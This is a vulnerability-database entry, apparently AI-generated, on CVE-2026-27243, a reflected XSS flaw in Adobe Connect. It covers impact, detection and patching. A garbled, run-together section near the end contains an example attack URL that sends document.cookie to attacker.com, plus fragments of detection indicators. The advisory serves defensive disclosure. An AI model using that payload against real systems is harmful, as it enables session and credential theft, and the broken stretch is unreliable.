
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27243 is a reflected Cross-Site Scripting (XSS) vulnerability in Adobe Connect that allows unauthenticated attackers to inject malicious scripts into web pages viewed by victims. It affects Adobe Connect versions 2025.3, 12.10 and earlier (server), Connect Desktop Application up to 2025.3 on macOS, and Connect Desktop Application prior to 2025.9.15 on Windows. The vulnerability was disclosed on April 14, 2026, with the CVE record updated on April 27–28, 2026. It carries a CVSS v3.1 base score of 9.3 (Critical), assigned by Adobe Systems Incorporated (Adobe Advisory, NVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the reflected XSS variant (CAPEC-591). User-supplied input is not properly sanitized before being reflected back in HTTP responses, enabling an attacker to craft a malicious URL that, when visited by a victim, causes arbitrary JavaScript to execute in the victim's browser context. The attack requires no authentication or special privileges, has low complexity, and operates over the network — but does require user interaction (victim must visit a crafted URL or interact with a compromised page). The changed scope indicator means the injected script can affect resources beyond the vulnerable component itself, such as the victim's session or account (Adobe Advisory, NVD).
Successful exploitation can result in high confidentiality and integrity impact, potentially granting an attacker elevated access or full control over the victim's Adobe Connect account or session. Because the scope is changed, the injected script can reach beyond the vulnerable page — enabling session hijacking, credential theft, unauthorized actions within the victim's account, or further lateral movement within an organization's Adobe Connect environment. Availability is not directly impacted, but account compromise could disrupt legitimate user access (Adobe Advisory, NVD).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Feedly). The EPSS score is approximately 0.097%, indicating a low current probability of exploitation in the wild. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Detection coverage is available via Qualys (detection ID 733993) and Tenable pipeline plugins (Feedly).
https://target-connect-server/path?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.%3Cscript%3E, javascript:, onerror=, etc.) in Adobe Connect server access logs.<script>, alert(, document.cookie); repeated requests to the same vulnerable endpoint from different source IPs with varying payloads.Adobe has released patched versions to address this vulnerability: update Adobe Connect server to version 12.11 or later, Connect Desktop Application on Windows to 2025.9.15 or later, and Connect Desktop Application on macOS to a version newer than 2025.3. No specific configuration-based workaround has been published; upgrading to the patched version is the primary remediation. As a defense-in-depth measure, organizations should implement security awareness training to educate users about the risks of clicking suspicious or unsolicited Adobe Connect links, and consider deploying Content Security Policy (CSP) headers if operating a self-hosted instance (Adobe Advisory).
The Center for Internet Security (CIS) published an advisory noting multiple vulnerabilities in Adobe products that could allow for arbitrary code execution, referencing this CVE as part of Adobe's April 2026 patch cycle (CIS Advisory). Security aggregators including Tenable, VulDB, and Qualys have added detection coverage for the vulnerability. No significant independent researcher commentary or social media discussion has been identified beyond standard vulnerability tracking and patch notification channels.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."